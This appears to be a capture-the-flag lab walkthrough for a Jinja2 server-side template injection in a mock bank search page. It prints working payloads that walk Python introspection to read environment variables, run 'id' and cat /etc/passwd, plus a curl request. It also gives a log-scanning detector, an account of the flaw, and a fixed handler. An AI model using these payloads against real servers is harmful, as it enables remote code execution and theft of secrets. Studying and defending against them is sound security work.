Labs / Template Injector

  • Daily Challenge
  • Released 29 Aug 2025

🔥 Their search function processes templates in real-time - what could go wrong?

SecureBank's advanced search feature boasts dynamic template processing for personalized results. But when user input meets template engines without proper sanitization, the server might just execute more than they bargained for. 🚀 Time to turn their templates against them!

Flags: 1 · Points: 1 · Daily Challenge · Pro Exclusive
Lab environment: private AWS-dedicated instance, ~1-2 min setup

🔍 Template Injector - Complete Server-Side Template Injection Solution

Objective: Exploit the Server-Side Template Injection (SSTI) vulnerability in SecureBank's search functionality to achieve remote code execution and extract the flag from the server's environment variables.

🔍 Step 1: Understanding Server-Side Template Injection

Server-Side Template Injection occurs when user input is embedded into a template's source before the engine parses it, rather than being passed to the template as data. In Flask applications using Jinja2, this can lead to remote code execution through Python object introspection and access to system functions.

🔍 Step 2: Initial Reconnaissance

Navigate to <target-ip> to reach the SecureBank customer portal. Explore the application and locate the search functionality at <target-ip>/search. The search feature advertises "advanced template processing for personalized results" - a strong indicator of a potential SSTI vulnerability.

🔍 Step 3: SSTI Detection and Testing

Test the search functionality for template injection vulnerabilities using mathematical expressions:

Basic Detection

# Test basic math injection
Search query: {{7*7}}
Expected result: 49

# URL encoded version:
%7B%7B7*7%7D%7D

Template Syntax Testing

# Test Jinja2 syntax
{{7*'7'}}
Expected: 7777777

# Test object access
{{''.__class__}}

Error-Based Detection

# Trigger template errors
{{undefined_variable}}

# Invalid syntax
{{7*}}

🔍 Step 4: Confirming SSTI Vulnerability

When you search for {{7*7}}, observe that the page shows "Search Results for: 49" instead of "Search Results for: {{7*7}}". The template engine evaluated the expression: the input was parsed as template code rather than displayed as text, which confirms the SSTI vulnerability.

🔍 Step 5: Python Object Introspection

Exploit Python's object model to access system functions through Jinja2 template injection:

# Access base object classes
{{''.__class__.__mro__}}

# List all subclasses
{{''.__class__.__mro__[1].__subclasses__()}}

# Find useful classes (like subprocess.Popen)
{{''.__class__.__mro__[1].__subclasses__()[104]}}

🔍 Step 6: Environment Variable Extraction

The flag is stored in the FLAG environment variable. Use Python object introspection to access the os module and extract environment variables:

Method 1: Direct os.environ Access

# Reach the os module through a subclass's __init__ globals and read FLAG
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ['FLAG'] }}

Method 2: Dump the Whole Environment

# Same object chain, but print every environment variable and look for FLAG in the output
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ }}

🔍 Step 7: Payload Construction and Execution

Construct the final SSTI payload to extract the flag:

Raw Payload:

{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].environ['FLAG'] }}

URL Encoded Payload:

%7B%7B%20%5B%5D.__class__.__base__.__subclasses__%28%29%5B104%5D.__init__.__globals__%5B%27sys%27%5D.modules%5B%27os%27%5D.environ%5B%27FLAG%27%5D%20%7D%7D

🔍 Step 8: Exploitation Methods

Using cURL

# Execute SSTI payload
curl "http://<target-ip>/search?q=%7B%7B%20%5B%5D.__class__.__base__.__subclasses__%28%29%5B104%5D.__init__.__globals__%5B%27sys%27%5D.modules%5B%27os%27%5D.environ%5B%27FLAG%27%5D%20%7D%7D"

Using Browser

  1. Navigate to /search
  2. Enter the SSTI payload in the search box
  3. Submit the search form
  4. Observe the flag in the search results

Using Burp Suite

  1. Intercept the search request
  2. Modify the query parameter with the SSTI payload
  3. Forward the request
  4. Analyze response for flag extraction
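
As a defender-side counterpart to the requests above (an added example, not part of the lab), the following scanner flags the probe and payload shapes used in this writeup in web-server access logs, including the URL-encoded and double-encoded forms. The log lines are constructed samples using documentation IP addresses.

```python
# Added example (not part of the lab): scan access logs for the probe and
# payload shapes used in this writeup. Log lines are constructed samples.
import re
from urllib.parse import unquote, urlsplit, parse_qs

SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2025:10:15:02 +0000] "GET /search?q=banking HTTP/1.1" 200 512
203.0.113.5 - - [29/Aug/2025:10:15:09 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
203.0.113.5 - - [29/Aug/2025:10:16:41 +0000] "GET /search?q=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1" 200 2210
198.51.100.7 - - [29/Aug/2025:10:17:00 +0000] "GET /search?q=%257B%257B7*7%257D%257D HTTP/1.1" 200 512
198.51.100.7 - - [29/Aug/2025:10:18:13 +0000] "GET /static/app.js HTTP/1.1" 200 8803
"""

# Common log format: client, timestamp, request line, status.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Indicator classes: template delimiters (engine-agnostic) and the Python
# introspection names that the Jinja2 payloads above depend on.
DELIMITER_RE = re.compile(r"\{\{|\{%|\$\{|<%|#\{")
INTROSPECTION_RE = re.compile(r"__(class|mro|subclasses|globals|init|base)__|\.popen\(|\benviron\b")

def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (catches %257B double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return indicator kinds found in any query parameter of a request target."""
    kinds = []
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for raw in values:
            decoded = fully_decode(raw)
            if DELIMITER_RE.search(decoded) and "ssti-delimiter" not in kinds:
                kinds.append("ssti-delimiter")
            if INTROSPECTION_RE.search(decoded) and "python-introspection" not in kinds:
                kinds.append("python-introspection")
    return kinds

def scan_log(text):
    """Return (ip, timestamp, decoded query, kinds) for each request matching an indicator."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (kinds := classify(m["target"])):
            hits.append((m["ip"], m["ts"], fully_decode(urlsplit(m["target"]).query), kinds))
    return hits
```

Run it as `scan_log(SAMPLE_LOG)`: the plain query is ignored, the three template probes are reported with their decoded query and indicator kinds, so a single client sending delimiter probes followed by introspection names stands out in the output.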

🔍 Step 9: Successful Flag Extraction

When the SSTI payload executes successfully, the flag value appears in the search results heading. This confirms remote code execution and extraction of the flag from the server's environment variables.

🔍 Step 10: Advanced SSTI Techniques

Command Execution

# Execute system commands
{{ [].__class__.__base__.__subclasses__()[104]('id', shell=True, stdout=-1).communicate()[0].strip() }}

File System Access

# Read files
{{ [].__class__.__base__.__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/passwd').read() }}

🔍 Step 11: Understanding the Vulnerability

The Flask application contains vulnerable code in the search function:

from flask import render_template_string

# query is the raw search parameter from the request; results is the database
# lookup (not shown in the writeup)
template = f"""
<div class="search-results">
    <h3>Search Results for: {query}</h3>
    <p>Found {len(results)} results</p>
</div>
"""
rendered_template = render_template_string(template)

The user-supplied query is interpolated into the template source by the f-string before render_template_string hands it to Jinja2, so any template syntax in the query is compiled and executed instead of being shown as text. The fix is to keep the template source constant and pass query and results to the template as variables.

🔍 Step 12: Security Implications

SSTI vulnerabilities can lead to:

  • Remote Code Execution: Complete server compromise
  • Data Exfiltration: Access to sensitive files and databases
  • Environment Disclosure: Exposure of configuration and secrets
  • Privilege Escalation: Potential system-level access
  • Lateral Movement: Access to internal network resources

🔍 Step 13: Remediation Strategies

To prevent SSTI vulnerabilities:

  • Input Sanitization: Never directly embed user input in templates
  • Template Sandboxing: Use restricted template environments
  • Parameterized Templates: Use template variables instead of string concatenation
  • Content Security Policy: Implement CSP headers to limit template execution
  • Regular Security Testing: Automated and manual SSTI testing
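
Added example, not the lab's own code: the vulnerable handler from Step 11 beside the parameterized version the list above calls for, exercised through Flask's test client so it runs offline. The route paths, the `q` parameter and the `run_search` stub are assumptions.

```python
# Added example (not the lab's code): the Step 11 handler beside a fixed one.
# Assumptions: a `q` query parameter and a `run_search` stub for the lookup.
from flask import Flask, request, render_template_string

app = Flask(__name__)

def run_search(query):
    # Hypothetical stand-in for the lab's database lookup: finds nothing.
    return []

@app.route("/search-vulnerable")
def search_vulnerable():
    query = request.args.get("q", "")
    results = run_search(query)
    # BUG: the f-string splices the user's query into the template *source*
    # before Jinja2 parses it, so {{ ... }} in the query becomes template code.
    template = f"""
<div class="search-results">
    <h3>Search Results for: {query}</h3>
    <p>Found {len(results)} results</p>
</div>
"""
    return render_template_string(template)

# FIX: the template source is a constant; user input only enters as a
# context variable, which Jinja2 renders as data and (because Flask
# autoescapes string templates) HTML-escapes.
SAFE_TEMPLATE = """
<div class="search-results">
    <h3>Search Results for: {{ query }}</h3>
    <p>Found {{ results|length }} results</p>
</div>
"""

@app.route("/search")
def search_fixed():
    query = request.args.get("q", "")
    results = run_search(query)
    return render_template_string(SAFE_TEMPLATE, query=query, results=results)

def render_search(path, q):
    """GET path?q=<q> through the Flask test client and return the body text."""
    with app.test_client() as client:
        return client.get(path, query_string={"q": q}).get_data(as_text=True)
```

With `{{7*7}}` as the query, `/search-vulnerable` renders "Search Results for: 49" while `/search` renders the literal text "Search Results for: {{7*7}}"; a `<b>` query comes back HTML-escaped from the fixed route.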

Real-World Application: SSTI vulnerabilities are commonly found in web applications using template engines like Jinja2, Twig, Smarty, and FreeMarker. They represent one of the most critical web application vulnerabilities due to their potential for complete system compromise.